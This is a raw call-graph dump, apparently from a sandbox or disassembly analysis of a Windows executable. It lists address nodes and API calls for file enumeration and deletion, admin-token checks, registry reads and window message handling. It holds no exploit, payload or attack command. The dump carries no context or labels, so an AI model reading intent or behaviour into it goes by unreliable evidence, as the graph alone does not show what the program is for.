19999->19880 20445 40b278 20000->20445 20003 5c6871 20003->19886 20003->19887 20447 5cd52c 20004->20447 20007 5c685c GetFileAttributesW 20008 5cd6d7 20007->20008 20009 5cd6fe 20008->20009 20451 429044 20008->20451 20011 5cbfb8 107 API calls 20009->20011 20014 5cd712 20011->20014 20016 5cd747 20014->20016 20465 5cd54c 20014->20465 20017 5cd761 20016->20017 20018 5cd54c 12 API calls 20016->20018 20019 5cd77b 20017->20019 20020 5cd54c 12 API calls 20017->20020 20018->20017 20021 5cd54c 12 API calls 20019->20021 20023 5cd79a 20019->20023 20020->20019 20021->20023 20022 5cd7d7 20470 5cd600 20022->20470 20023->20022 20024 5cd54c 12 API calls 20023->20024 20024->20022 20027 406f28 12 API calls 20028 5cd7f6 20027->20028 20028->19890 20099 40b278 20098->20099 20100 423a2d DeleteFileW 20099->20100 20101 423a75 20100->20101 20102 423a3f GetLastError GetFileAttributesW 20100->20102 20101->19892 20103 423a51 20102->20103 20104 423a6f SetLastError 20102->20104 20103->20104 20105 423a5a 20103->20105 20104->20101 20106 423a61 RemoveDirectoryW 20105->20106 20106->20101 20108 5c6fb0 14 API calls 20107->20108 20109 6b90b9 20108->20109 20110 429d18 48 API calls 20109->20110 20111 6b90be 20110->20111 20112 6b9103 20111->20112 20113 6b90c3 20111->20113 20115 60d8b0 126 API calls 20112->20115 21172 5c5428 20113->21172 20116 6b90f3 20115->20116 20118 40a228 12 API calls 20116->20118 20120 6b9129 20118->20120 20120->19900 20120->19901 20121 6b90d6 21191 6b8f64 20121->21191 20137 5c7ce0 20128->20137 20130 5c7f2e 20130->19980 20131 5c7f30 20130->20131 20132 5c7ce0 65 API calls 20131->20132 20133 5c7f3a 20132->20133 20133->19980 20135 407391 GetTickCount 20134->20135 20136 40739f 20134->20136 20135->20136 20136->19983 20162 429d18 20137->20162 20140 5c7cfd AllocateAndInitializeSid 20141 5c7cf4 20140->20141 20142 5c7d2f GetVersion 20140->20142 20141->20130 20143 5c7d4f GetModuleHandleW 20142->20143 20144 5c7d66 20142->20144 20145 414020 14 API calls 20143->20145 20146 5c7d8d GetCurrentThread OpenThreadToken 20144->20146 20147 5c7d6a CheckTokenMembership 20144->20147 20148 5c7d64 20145->20148 20151 5c7dde GetTokenInformation 20146->20151 20152 5c7da9 GetLastError 20146->20152 20149 5c7d7e 20147->20149 20150 5c7eb4 FreeSid 20147->20150 20148->20144 20149->20150 20150->20130 20153 5c7e08 GetLastError 20151->20153 20154 5c7e21 20151->20154 20152->20141 20155 5c7dbf GetCurrentProcess OpenProcessToken 20152->20155 20153->20141 20153->20154 20156 5c7e29 GetTokenInformation 20154->20156 20155->20141 20155->20151 20156->20141 20160 5c7e53 20156->20160 20157 5c7e84 20159 406f28 12 API calls 20157->20159 20158 5c7e60 EqualSid 20158->20160 20161 5c7ea3 CloseHandle 20159->20161 20160->20157 20160->20158 20161->20130 20163 429d21 20162->20163 20164 429d26 20162->20164 20166 429cc8 20163->20166 20164->20140 20164->20141 20173 408d70 20166->20173 20169 429cf4 20183 408ff8 20169->20183 20174 408d86 20173->20174 20175 408d7f 20173->20175 20194 40909c 20174->20194 20191 407068 20175->20191 20181 429c68 GetVersionExW 20182 429c9d 20181->20182 20182->20169 20184 409004 20183->20184 20185 40900b 20183->20185 20186 407068 12 API calls 20184->20186 20187 40909c 33 API calls 20185->20187 20186->20185 20188 409012 20187->20188 20240 408fb0 20188->20240 20192 40701c 12 API calls 20191->20192 20193 40707b 20192->20193 20193->20174 20195 408d8d 20194->20195 20196 4090ba 20194->20196 20200 408e18 20195->20200 20215 408ccc 20196->20215 20199 405d88 10 API calls 20199->20195 20208 408e26 20200->20208 20202 408d94 20202->20169 20202->20181 20203 408e4f GetTickCount 20203->20208 20204 408e67 GetTickCount 20204->20202 20204->20208 20205 408ec1 GetTickCount 20205->20202 20205->20208 20206 408ef8 GetTickCount 20236 40901c 20206->20236 20208->20202 20208->20203 20208->20204 20208->20205 20208->20206 20209 408e96 GetCurrentThreadId 20208->20209 20224 4092d8 GetCurrentThreadId 20208->20224 20229 408af8 20208->20229 20209->20202 20211 408f22 GetTickCount 20212 408f08 20211->20212 20212->20206 20212->20211 20213 408f8c 20212->20213 20213->20202 20214 408f92 GetCurrentThreadId 20213->20214 20214->20202 20216 408cda 20215->20216 20217 408cd5 20215->20217 20219 408d14 20216->20219 20220 408d08 20216->20220 20218 408bb4 15 API calls 20217->20218 20218->20216 20222 406298 10 API calls 20219->20222 20221 406298 10 API calls 20220->20221 20223 408d12 20221->20223 20222->20223 20223->20195 20223->20199 20225 4092e5 20224->20225 20226 4092ec 20224->20226 20225->20208 20227 409313 20226->20227 20228 409300 GetCurrentThreadId 20226->20228 20227->20208 20228->20227 20230 408b03 20229->20230 20231 408b51 20230->20231 20232 408b32 20230->20232 20233 408b29 Sleep 20230->20233 20231->20208 20234 408b41 Sleep 20232->20234 20235 408b4a SwitchToThread 20232->20235 20233->20231 20234->20231 20235->20231 20237 409075 20236->20237 20239 40902e 20236->20239 20237->20212 20238 40905c Sleep 20238->20239 20239->20237 20239->20238 20245 408cb4 GetCurrentThreadId 20240->20245 20243 40901c Sleep 20244 408fe7 20243->20244 20244->20164 20246 408cc1 20245->20246 20247 408cc8 20245->20247 20248 407068 12 API calls 20246->20248 20247->20243 20247->20244 20248->20247 20250 5b8611 20249->20250 20256 5b86f2 20249->20256 20251 5b8617 IsWindowUnicode 20250->20251 20252 5b8621 20250->20252 20251->20252 20253 5b8648 PeekMessageA 20252->20253 20254 5b8632 PeekMessageW 20252->20254 20255 5b865c 20253->20255 20254->20255 20255->20256 20270 5ba368 GetCapture 20255->20270 20256->19987 20258 5b8697 20258->20256 20277 5b8488 20258->20277 20267 5b86d5 TranslateMessage 20268 5b86ea DispatchMessageA 20267->20268 20269 5b86e2 DispatchMessageW 20267->20269 20268->20256 20269->20256 20271 5ba37d 20270->20271 20274 5ba38f 20270->20274 20271->20274 20303 50e958 20271->20303 20273 5ba3a0 GetParent 20273->20274 20275 5ba39a 20273->20275 20274->20258 20275->20273 20275->20274 20276 50e958 7 API calls 20275->20276 20276->20275 20278 5b849c 20277->20278 20279 5b84b3 20277->20279 20278->20279 20316 5b9948 20278->20316 20279->20256 20281 5b8340 20279->20281 20282 5b838a 20281->20282 20283 5b8350 20281->20283 20282->20256 20285 5b8390 20282->20285 20283->20282 20284 5b8377 TranslateMDISysAccel 20283->20284 20284->20282 20286 5b83ab 20285->20286 20297 5b841d 20285->20297 20287 5b83b6 GetCapture 20286->20287 20286->20297 20288 5b8440 GetWindowThreadProcessId GetWindowThreadProcessId 20287->20288 20292 5b83c1 20287->20292 20289 5b8461 SendMessageW 20288->20289 20288->20297 20289->20297 20290 5b83d2 20293 5b83f8 IsWindowUnicode 20290->20293 20292->20290 20294 5b83db GetParent 20292->20294 20442 50e9b4 20292->20442 20295 5b8402 SendMessageW 20293->20295 20296 5b8421 SendMessageA 20293->20296 20294->20292 20295->20297 20296->20297 20297->20256 20298 5b82f8 20297->20298 20299 5b8309 IsWindowUnicode 20298->20299 20300 5b833d 20298->20300 20301 5b832a IsDialogMessageA 20299->20301 20302 5b8315 IsDialogMessageW 20299->20302 20300->20256 20300->20267 20301->20300 20302->20300 20304 50e963 GetWindowThreadProcessId 20303->20304 20311 50e9aa 20303->20311 20305 50e96e GetCurrentProcessId 20304->20305 20304->20311 20306 50e978 20305->20306 20305->20311 20307 50e982 GlobalFindAtomW 20306->20307 20308 50e991 GetPropW 20307->20308 20309 50e9a3 20307->20309 20308->20311 20312 50e924 GetCurrentProcessId GetWindowThreadProcessId 20309->20312 20311->20275 20313 50e951 20312->20313 20314 50e93b 20312->20314 20313->20311 20314->20313 20315 50e940 SendMessageW 20314->20315 20315->20313 20317 5b995e 20316->20317 20318 5b9975 20316->20318 20324 5b98d4 20317->20324 20318->20279 20320 5b9965 20333 5b631c 20320->20333 20325 5b9934 20324->20325 20326 5b98e2 20324->20326 20325->20320 20326->20325 20327 5b98f8 IsWindowVisible 20326->20327 20327->20325 20328 5b9902 20327->20328 20329 5b9936 20328->20329 20330 5b9914 20328->20330 20345 5b96e0 20329->20345 20332 5b9921 ShowWindow 20330->20332 20332->20325 20334 5b6328 UnhookWindowsHookEx 20333->20334 20335 5b6333 20333->20335 20334->20335 20336 5b639a 20335->20336 20337 5b6354 SetEvent GetCurrentThreadId 20335->20337 20342 5b9720 20336->20342 20338 5b636c 20337->20338 20339 5b6391 CloseHandle 20337->20339 20340 5b6378 MsgWaitForMultipleObjects 20338->20340 20351 5b871c 20338->20351 20339->20336 20340->20338 20340->20339 20343 5b973d 20342->20343 20344 5b972d KillTimer 20342->20344 20343->20318 20344->20343 20346 5b9720 KillTimer 20345->20346 20347 5b96f0 SetTimer 20346->20347 20348 5b971c 20347->20348 20349 5b9715 20347->20349 20348->20325 20350 5b9948 162 API calls 20349->20350 20350->20348 20352 5b85f0 163 API calls 20351->20352 20353 5b872b 20352->20353 20354 5b8738 20353->20354 20356 5b92c8 20353->20356 20354->20340 20382 5b923c GetCursorPos 20356->20382 20359 5b9311 20385 5b615c 20359->20385 20361 5b9948 160 API calls 20361->20359 20362 5b931b 20393 50ea64 20362->20393 20366 5b9333 20368 5b9379 20366->20368 20375 5b9383 20366->20375 20383 5104f0 114 API calls 20382->20383 20384 5b9251 20383->20384 20384->20359 20384->20361 20386 5b6188 20385->20386 20387 5b6166 20385->20387 20388 40a1c8 12 API calls 20386->20388 20387->20386 20389 5b6174 20387->20389 20390 5b618f 20388->20390 20391 40a5a8 12 API calls 20389->20391 20390->20362 20392 5b6181 20391->20392 20392->20362 20394 50ea77 20393->20394 20395 50ea88 20394->20395 20396 50ea7d 20394->20396 20398 40b698 12 API calls 20395->20398 20397 40a5a8 12 API calls 20396->20397 20399 50ea86 20397->20399 20398->20399 20400 5b94fc 20399->20400 20401 5b9510 20400->20401 20402 5b9526 20401->20402 20403 40a5a8 12 API calls 20401->20403 20402->20366 20404 5b951c 20403->20404 20404->20402 20405 541b1c 110 API calls 20404->20405 20443 50e958 7 API calls 20442->20443 20444 50e9be 20443->20444 20444->20292 20446 40b27e GetFileAttributesW 20445->20446 20446->20003 20448 5cd537 20447->20448 20449 40a1c8 12 API calls 20448->20449 20450 5cd546 20448->20450 20449->20448 20450->20007 20452 429050 20451->20452 20481 4244f8 20452->20481 20455 40a5a8 12 API calls 20456 429088 20455->20456 20457 40a1c8 12 API calls 20456->20457 20458 42909d 20457->20458 20459 4098c4 20458->20459 20460 4098d2 20459->20460 20461 4098c8 20459->20461 20464 409910 20460->20464 20525 407004 20460->20525 20462 40a034 12 API calls 20461->20462 20462->20460 20528 429008 20465->20528 20467 5cd55d 20468 4098c4 12 API calls 20467->20468 20469 5cd562 20468->20469 20469->20016 20471 5cd60e 20470->20471 20472 5cd54c 12 API calls 20471->20472 20473 5cd627 20471->20473 20472->20473 20474 5cd54c 12 API calls 20473->20474 20475 5cd649 20473->20475 20474->20475 20476 5cd54c 12 API calls 20475->20476 20478 5cd67f 20475->20478 20476->20478 20477 5cd54c 12 API calls 20477->20478 20478->20477 20479 40a350 12 API calls 20478->20479 20480 5cd6b5 20478->20480 20479->20478 20480->20027 20484 424520 20481->20484 20487 424550 20484->20487 20488 424559 20487->20488 20491 4245b9 20488->20491 20500 424408 20488->20500 20490 42462c 20492 40a350 12 API calls 20490->20492 20491->20490 20498 4245d6 20491->20498 20493 424518 20492->20493 20493->20455 20494 424620 20496 40b3f0 12 API calls 20494->20496 20495 40a1c8 12 API calls 20495->20498 20496->20493 20497 40b3f0 12 API calls 20497->20498 20498->20494 20498->20495 20498->20497 20499 424408 105 API calls 20498->20499 20499->20498 20503 424888 20500->20503 20508 4248db 20503->20508 20509 4248e2 20503->20509 20504 40a228 12 API calls 20505 4252be 20504->20505 20506 40a1c8 12 API calls 20505->20506 20507 424421 20506->20507 20507->20491 20508->20509 20510 423364 59 API calls 20508->20510 20511 42438c 105 API calls 20508->20511 20512 40b29c 12 API calls 20508->20512 20515 423004 20508->20515 20522 423070 20508->20522 20509->20504 20510->20508 20511->20508 20512->20508 20516 42301e 20515->20516 20517 42300e 20515->20517 20519 422bf8 12 API calls 20516->20519 20518 422bf8 12 API calls 20517->20518 20520 42301b 20518->20520 20521 423029 20519->20521 20520->20508 20521->20508 20523 422bf8 12 API calls 20522->20523 20524 423081 20523->20524 20524->20508 20526 41063c 12 API calls 20525->20526 20527 407009 20526->20527 20527->20464 20529 42900f 20528->20529 20530 40a5a8 12 API calls 20529->20530 20531 429027 20530->20531 20531->20467 21173 5c5438 21172->21173 21174 40b698 12 API calls 21173->21174 21175 5c5449 21174->21175 21176 6b8de4 21175->21176 21177 40b4c8 12 API calls 21176->21177 21178 6b8e29 21177->21178 21179 6b8e34 FindFirstFileW 21178->21179 21180 6b8efb 21179->21180 21188 6b8e47 21179->21188 21181 40a228 12 API calls 21180->21181 21182 6b8f18 21181->21182 21183 40a1c8 12 API calls 21182->21183 21184 6b8f20 21183->21184 21184->20121 21185 6b8ec5 FindNextFileW 21186 6b8edd FindClose 21185->21186 21185->21188 21186->20121 21187 40b4c8 12 API calls 21187->21188 21188->21185 21188->21187 21189 423a20 5 API calls 21188->21189 21190 6b8eb7 SetFileAttributesW 21188->21190 21189->21185 21190->21188 21192 40a1c8 12 API calls 21191->21192 21360 5cbe88 106 API calls 21359->21360 21361 5cbf4d 21360->21361 21361->19926 21363 40b278 21362->21363 21364 42402a SetCurrentDirectoryW 21363->21364 21364->19939 21366 5c6fb0 14 API calls 21365->21366 21367 6b6ca9 21366->21367 21368 5c6f50 13 API calls 21367->21368 21378 6b6cbd 21368->21378 21369 6b6e53 21370 40a228 12 API calls 21369->21370 21372 6b6e8a 21370->21372 21371 610358 14 API calls 21371->21378 21373 40a228 12 API calls 21372->21373 21374 6b6e97 21373->21374 21374->19946 21375 40a1c8 12 API calls 21375->21378 21376 5c6fb0 14 API calls 21376->21378 21377 40a5a8 12 API calls 21377->21378 21378->21369 21378->21371 21378->21375 21378->21376 21378->21377 21379 42339c 105 API calls 21378->21379 21379->21378 21380 40952e 21385 409611 21380->21385 21386 409541 21380->21386 21381 4095b4 21382 4095e4 RtlUnwind 21381->21382 21383 4095cf UnhandledExceptionFilter 21381->21383 21384 41063c 12 API calls 21382->21384 21383->21382 21383->21385 21384->21385 21386->21381 21386->21385 21387 409594 UnhandledExceptionFilter 21386->21387 21387->21385 21388 4095a9 21387->21388 21388->21382 21389 406df0 21390 406e15 21389->21390 21391 406e03 VirtualFree 21390->21391 21392 406e19 21390->21392 21391->21390 21393 406e95 21392->21393 21394 406e7f VirtualFree 21392->21394 21394->21392 21395 6ae698 21400 610424 21395->21400 21406 610443 21400->21406 21401 610479 21403 610486 GetUserDefaultLangID 21401->21403 21408 61047b 21401->21408 21402 61047d 21459 5c7ff4 GetModuleHandleW 21402->21459 21403->21408 21405 610457 21409 6ae3c8 21405->21409 21406->21401 21406->21402 21406->21405 21407 6103f8 GetLocaleInfoW 21407->21408 21408->21405 21408->21407 21410 6ae3da 21409->21410 21411 6ae61d 21409->21411 21505 464cd0 21410->21505 21414 40a77c 12 API calls 21415 6ae3f0 21414->21415 21416 5cd600 12 API calls 21415->21416 21417 6ae404 21416->21417 21509 5c77c4 21417->21509 21420 5c77c4 12 API calls 21421 6ae42c 21420->21421 21512 40bfac 21421->21512 21425 6ae454 21426 6ae489 21425->21426 21532 5c7f8c GetDC 21425->21532 21427 6ae4a8 21426->21427 21428 6ae499 21426->21428 21431 40a644 12 API calls 21427->21431 21430 40a644 12 API calls 21428->21430 21433 6ae4a6 21430->21433 21431->21433 21432 6ae476 21432->21426 21437 40a5a8 12 API calls 21432->21437 21434 6ae4be 21433->21434 21435 6ae4cd 21433->21435 21438 40a644 12 API calls 21434->21438 21436 40a644 12 API calls 21435->21436 21439 6ae4cb 21436->21439 21437->21426 21438->21439 21440 6ae4f2 21439->21440 21441 6ae4e3 21439->21441 21443 40a644 12 API calls 21440->21443 21442 40a644 12 API calls 21441->21442 21444 6ae4f0 21442->21444 21443->21444 21529 5c8fb8 21444->21529 21446 6ae527 21447 5c8fb8 12 API calls 21446->21447 21448 6ae540 21447->21448 21449 5c8fb8 12 API calls 21448->21449 21450 6ae559 21449->21450 21451 5c8fb8 12 API calls 21450->21451 21452 6ae572 21451->21452 21453 5b8250 14 API calls 21452->21453 21458 6ae58a 21453->21458 21454 6ae5fe 21454->21411 21455 6ae607 SendNotifyMessageW 21454->21455 21455->21411 21456 464cd0 105 API calls 21456->21458 21457 40a5a8 12 API calls 21457->21458 21458->21454 21458->21456 21458->21457 21460 414020 14 API calls 21459->21460 21461 5c8026 21460->21461 21462 5c802a 21461->21462 21463 429d18 48 API calls 21461->21463 21468 40a1c8 12 API calls 21462->21468 21464 5c8038 21463->21464 21465 5c803d 21464->21465 21466 5c8075 21464->21466 21481 5c7a14 21465->21481 21469 5c7a14 RegOpenKeyExW 21466->21469 21471 5c80e5 21468->21471 21472 5c808e 21469->21472 21470 5c8056 21473 5c80ab 21470->21473 21484 5c793c 21470->21484 21474 40a1c8 12 API calls 21471->21474 21472->21473 21478 5c793c 14 API calls 21472->21478 21475 40b4c8 12 API calls 21473->21475 21477 5c80ed 21474->21477 21475->21462 21477->21408 21480 5c80a2 RegCloseKey 21478->21480 21480->21473 21482 5c7a1f 21481->21482 21483 5c7a25 RegOpenKeyExW 21481->21483 21482->21483 21483->21470 21487 5c77f4 21484->21487 21488 5c781a RegQueryValueExW 21487->21488 21489 5c785f 21488->21489 21496 5c783d 21488->21496 21490 40a1c8 12 API calls 21489->21490 21492 5c7929 RegCloseKey 21490->21492 21491 5c7857 21493 40a1c8 12 API calls 21491->21493 21492->21473 21493->21489 21494 428ffc 12 API calls 21494->21496 21495 40a350 12 API calls 21495->21496 21496->21489 21496->21491 21496->21494 21496->21495 21497 40a774 12 API calls 21496->21497 21498 5c7892 RegQueryValueExW 21497->21498 21498->21488 21499 5c78ae 21498->21499 21499->21489 21500 40b3f0 12 API calls 21499->21500 21501 5c78ee 21500->21501 21503 40a774 12 API calls 21501->21503 21504 5c7900 21501->21504 21502 40a5a8 12 API calls 21502->21489 21503->21504 21504->21502 21506 464cec 21505->21506 21507 464cdd 21505->21507 21506->21414 21535 464c44 21507->21535 21540 5c76f8 21509->21540 21513 40bfc2 21512->21513 21516 40bfdf 21512->21516 21515 40bfe1 21513->21515 21513->21516 21554 40c024 21513->21554 21515->21516 21585 40fd04 21515->21585 21518 40c278 21516->21518 21519 40c407 21518->21519 21520 40c29d 21518->21520 21519->21425 21520->21519 21522 40a644 12 API calls 21520->21522 21524 40a5a8 12 API calls 21520->21524 21527 40c278 59 API calls 21520->21527 21633 40a61c 21520->21633 21643 40c254 21520->21643 21648 40c654 21520->21648 21670 40fd30 21520->21670 21678 40d370 21520->21678 21522->21520 21524->21520 21527->21520 21802 42437c 21529->21802 21531 5c8fd0 21531->21446 21533 40b278 21532->21533 21534 5c7fc1 EnumFontsW ReleaseDC 21533->21534 21534->21432 21536 410300 76 API calls 21535->21536 21537 464c82 21536->21537 21538 429044 105 API calls 21537->21538 21539 464c91 21538->21539 21539->21539 21541 5c77b7 21540->21541 21542 5c7718 21540->21542 21541->21420 21542->21541 21544 40b73c 12 API calls 21542->21544 21545 40b6e0 21542->21545 21544->21542 21550 40a6ec 21545->21550 21547 40b736 21547->21542 21548 40b6f0 21548->21547 21549 40b3f0 12 API calls 21548->21549 21549->21547 21551 40a6f2 21550->21551 21552 40a727 21550->21552 21551->21552 21553 406f28 12 API calls 21551->21553 21552->21548 21553->21552 21555 40c02d 21554->21555 21581 40c06a 21554->21581 21556 40c042 21555->21556 21557 40c06f 21555->21557 21558 40c046 21556->21558 21559 40c0a9 21556->21559 21560 40c080 21557->21560 21561 40c076 21557->21561 21563 40c04a 21558->21563 21564 40c08c 21558->21564 21565 40c0b0 21559->21565 21566 40c0b7 21559->21566 21591 40a258 21560->21591 21567 40a1ec 12 API calls 21561->21567 21571 40c04e 21563->21571 21578 40c0c0 21563->21578 21569 40c093 21564->21569 21570 40c09d 21564->21570 21572 40a1c8 12 API calls 21565->21572 21568 40a228 12 API calls 21566->21568 21567->21581 21568->21581 21574 40a210 SysFreeString 21569->21574 21595 40a288 21570->21595 21576 40c052 21571->21576 21577 40c0cf 21571->21577 21572->21581 21574->21581 21579 40c0ed 21576->21579 21584 40c05a 21576->21584 21580 40c024 28 API calls 21577->21580 21577->21581 21578->21581 21599 40c00c 21578->21599 21579->21581 21582 40bfac 28 API calls 21579->21582 21580->21577 21581->21513 21582->21579 21584->21581 21604 40d32c 21584->21604 21586 40fd29 21585->21586 21587 40fd0f 21585->21587 21586->21515 21610 4086e0 21587->21610 21593 40a25e 21591->21593 21592 40a284 21592->21581 21593->21592 21594 406f28 12 API calls 21593->21594 21594->21593 21596 40a28e 21595->21596 21597 40a294 SysFreeString 21596->21597 21598 40a2a6 21596->21598 21597->21596 21598->21581 21600 40c01c 21599->21600 21602 40c015 21599->21602 21601 407068 12 API calls 21600->21601 21603 40c023 21601->21603 21602->21578 21603->21578 21605 40d36c 21604->21605 21607 40d332 21604->21607 21605->21584 21606 40d363 21608 406f28 12 API calls 21606->21608 21607->21605 21607->21606 21609 40c024 28 API calls 21607->21609 21608->21605 21609->21606 21612 4086b0 21610->21612 21611 4086d8 21614 40fcd0 21611->21614 21612->21611 21613 40701c 12 API calls 21612->21613 21613->21611 21615 40fce1 21614->21615 21616 40fcd4 21614->21616 21615->21586 21618 40fbd4 21616->21618 21619 40fc83 21618->21619 21620 40fbf4 21618->21620 21619->21615 21625 40f77c 21620->21625 21622 40fc1d 21629 40f7e4 21622->21629 21626 40f785 21625->21626 21627 40f78f 21625->21627 21628 408e18 13 API calls 21626->21628 21627->21622 21628->21627 21630 40f7f4 21629->21630 21631 40f7ed 21629->21631 21630->21615 21632 408fb0 14 API calls 21631->21632 21632->21630 21634 40a620 21633->21634 21635 40a643 21633->21635 21636 40a210 21634->21636 21637 40a633 SysReAllocStringLen 21634->21637 21635->21520 21638 40a224 21636->21638 21639 40a216 SysFreeString 21636->21639 21637->21635 21640 40a1a8 21637->21640 21638->21520 21639->21638 21641 40a1c4 21640->21641 21642 40a1b4 SysAllocStringLen 21640->21642 21641->21520 21642->21640 21642->21641 21644 40c26c 21643->21644 21646 40c261 21643->21646 21645 407068 12 API calls 21644->21645 21647 40c273 21645->21647 21646->21520 21647->21520 21649 40c698 21648->21649 21650 40c669 21648->21650 21651 40a644 12 API calls 21649->21651 21665 40c6b5 21649->21665 21652 40c6ba 21650->21652 21653 40c66e 21650->21653 21651->21649 21654 40a61c 3 API calls 21652->21654 21652->21665 21655 40c6d1 21653->21655 21656 40c673 21653->21656 21654->21652 21659 40a5a8 12 API calls 21655->21659 21655->21665 21657 40c6e5 21656->21657 21658 40c678 21656->21658 21662 40c254 12 API calls 21657->21662 21657->21665 21660 40c6f9 21658->21660 21661 40c67d 21658->21661 21659->21655 21660->21665 21666 40c654 59 API calls 21660->21666 21663 40c686 21661->21663 21664 40c71c 21661->21664 21662->21657 21663->21649 21663->21665 21668 40c74d 21663->21668 21664->21665 21667 40c278 59 API calls 21664->21667 21665->21520 21666->21660 21667->21664 21668->21665 21669 40d370 28 API calls 21668->21669 21669->21668 21671 40fd42 21670->21671 21672 40fd04 26 API calls 21671->21672 21673 40fd57 21672->21673 21674 4086e0 12 API calls 21673->21674 21675 40fd66 21674->21675 21682 40fc98 21675->21682 21677 40fd6e 21677->21520 21679 40d374 21678->21679 21680 40d39d 21679->21680 21681 40d32c 28 API calls 21679->21681 21680->21520 21681->21680 21683 40fca3 21682->21683 21684 40fccb 21682->21684 21686 40faf8 21683->21686 21684->21677 21687 40fb14 21686->21687 21688 40fb1c 21686->21688 21698 40f99c 21687->21698 21690 40f77c 13 API calls 21688->21690 21691 40fb45 21690->21691 21692 40fb8a 21691->21692 21711 40f8a4 21691->21711 21695 40f7e4 14 API calls 21692->21695 21697 40fbac 21695->21697 21697->21684 21699 40f9b5 21698->21699 21700 40fa46 21698->21700 21701 40f9dc 21699->21701 21702 408ccc 25 API calls 21699->21702 21700->21688 21703 408e18 13 API calls 21701->21703 21704 40f9c3 21702->21704 21710 40f9ea 21703->21710 21704->21701 21722 408d44 21704->21722 21705 40fa1c 21707 408fb0 14 API calls 21705->21707 21709 40fa3e 21707->21709 21709->21688 21710->21705 21726 40f768 21710->21726 21712 40f8ac 21711->21712 21713 40f8b5 21712->21713 21729 40f39c 21712->21729 21715 40f638 21713->21715 21716 40f648 21715->21716 21717 40f651 21716->21717 21719 40f660 21716->21719 21737 40f304 21717->21737 21720 40f65e 21719->21720 21721 40f304 25 API calls 21719->21721 21720->21692 21721->21720 21723 408d51 21722->21723 21724 405d88 10 API calls 21723->21724 21725 408d6a 21724->21725 21725->21701 21727 408ccc 25 API calls 21726->21727 21728 40f770 21727->21728 21728->21710 21734 406298 21729->21734 21732 408ccc 25 API calls 21733 40f3ae 21732->21733 21733->21713 21735 405a04 10 API calls 21734->21735 21736 4062a4 21735->21736 21736->21732 21738 40f324 21737->21738 21739 40f31b 21737->21739 21741 40f331 21738->21741 21742 40f33e 21738->21742 21740 406298 10 API calls 21739->21740 21743 40f320 21740->21743 21748 405f80 21741->21748 21745 405a04 10 API calls 21742->21745 21743->21720 21746 40f343 21745->21746 21798 40f2d4 21746->21798 21749 405f90 21748->21749 21750 406018 21748->21750 21751 405fd4 21749->21751 21752 405f9d 21749->21752 21753 406021 21750->21753 21754 4058b8 21750->21754 21758 405a04 10 API calls 21751->21758 21755 405fa8 21752->21755 21761 405a04 10 API calls 21752->21761 21757 406039 21753->21757 21770 406148 21753->21770 21756 406293 21754->21756 21759 4059bb 21754->21759 21760 4058dc VirtualQuery 21754->21760 21755->21743 21756->21743 21766 40605c 21757->21766 21771 406120 21757->21771 21790 406040 21757->21790 21775 405feb 21758->21775 21764 40596e 21759->21764 21768 405a04 10 API calls 21759->21768 21773 405983 21760->21773 21774 405915 21760->21774 21778 405fb5 21761->21778 21762 4061ac 21765 405a04 10 API calls 21762->21765 21786 4061c5 21762->21786 21763 406011 21763->21743 21764->21743 21781 40625c 21765->21781 21777 40609c Sleep 21766->21777 21766->21790 21788 4059d2 21768->21788 21769 405fcd 21769->21743 21770->21762 21776 406184 Sleep 21770->21776 21770->21786 21772 405a04 10 API calls 21771->21772 21791 406129 21772->21791 21779 405a04 10 API calls 21773->21779 21774->21773 21785 405942 VirtualAlloc 21774->21785 21775->21763 21782 405d88 10 API calls 21775->21782 21776->21762 21783 40619e Sleep 21776->21783 21784 4060b4 Sleep 21777->21784 21777->21790 21778->21769 21787 405d88 10 API calls 21778->21787 21793 40598a 21779->21793 21780 406141 21780->21743 21781->21786 21792 405d88 10 API calls 21781->21792 21782->21763 21783->21770 21784->21766 21785->21773 21789 405958 VirtualAlloc 21785->21789 21786->21743 21787->21769 21788->21764 21796 405d88 10 API calls 21788->21796 21789->21764 21789->21773 21790->21743 21791->21780 21794 405d88 10 API calls 21791->21794 21795 406280 21792->21795 21793->21764 21797 405d88 10 API calls 21793->21797 21794->21780 21795->21743 21796->21764 21797->21764 21799 40f300 21798->21799 21800 40f2da 21798->21800 21799->21743 21800->21799 21801 405d88 10 API calls 21800->21801 21801->21799 21803 424380 21802->21803 21804 42438a 21802->21804 21805 406f28 12 API calls 21803->21805 21804->21531 21805->21804 21806 6b0178 21811 464f78 21806->21811 21808 6b0199 21809 6b01e4 21808->21809 21817 6a419c 21808->21817 21812 464f92 21811->21812 21813 464f83 21811->21813 21815 464fab 21812->21815 21835 40d208 21812->21835 21814 464c44 105 API calls 21813->21814 21814->21812 21815->21808 21828 6a4218 21817->21828 21834 6a41cd 21817->21834 21818 6a4265 21902 5cd324 21818->21902 21819 5cd324 106 API calls 21819->21834 21820 5cd324 106 API calls 21820->21828 21823 40a1ec 12 API calls 21826 6a4292 21823->21826 21824 40ada0 12 API calls 21824->21828 21825 40b3f0 12 API calls 21825->21834 21827 40a1c8 12 API calls 21826->21827 21829 6a429a 21827->21829 21828->21818 21828->21820 21828->21824 21830 40a77c 12 API calls 21828->21830 21832 40a644 12 API calls 21828->21832 21829->21808 21830->21828 21831 40a774 12 API calls 21831->21834 21832->21828 21833 40a5a8 12 API calls 21833->21834 21834->21819 21834->21825 21834->21828 21834->21831 21834->21833 21838 40cf60 21835->21838 21839 40cf83 21838->21839 21843 40cf9e 21838->21843 21840 40cf8e 21839->21840 21841 407068 12 API calls 21839->21841 21842 40d32c 28 API calls 21840->21842 21841->21840 21851 40cf99 21842->21851 21844 40cfec 21843->21844 21845 407068 12 API calls 21843->21845 21846 40cffa 21844->21846 21847 407068 12 API calls 21844->21847 21845->21844 21848 40d00c 21846->21848 21850 40d0d9 21846->21850 21847->21846 21852 40d09a 21848->21852 21861 40cf1c 21848->21861 21856 40d121 21850->21856 21880 40c894 21850->21880 21851->21815 21852->21851 21855 40cf60 59 API calls 21852->21855 21854 40d32c 28 API calls 21854->21852 21855->21852 21856->21854 21857 40d024 21857->21852 21871 40c76c 21857->21871 21859 40d073 21860 406f28 12 API calls 21859->21860 21860->21852 21862 41063c 12 API calls 21861->21862 21863 40cf25 21862->21863 21864 40cf3b 21863->21864 21865 40cf2d 21863->21865 21868 41063c 12 API calls 21864->21868 21866 41063c 12 API calls 21865->21866 21867 40cf32 21866->21867 21867->21857 21869 40cf49 21868->21869 21870 41063c 12 API calls 21869->21870 21870->21867 21872 40c788 21871->21872 21875 40c7cc 21871->21875 21873 40c85e 21872->21873 21872->21875 21878 40c835 21872->21878 21879 40c806 21872->21879 21874 407068 12 API calls 21873->21874 21874->21875 21875->21859 21877 40c76c 59 API calls 21877->21879 21878->21875 21884 40c420 21878->21884 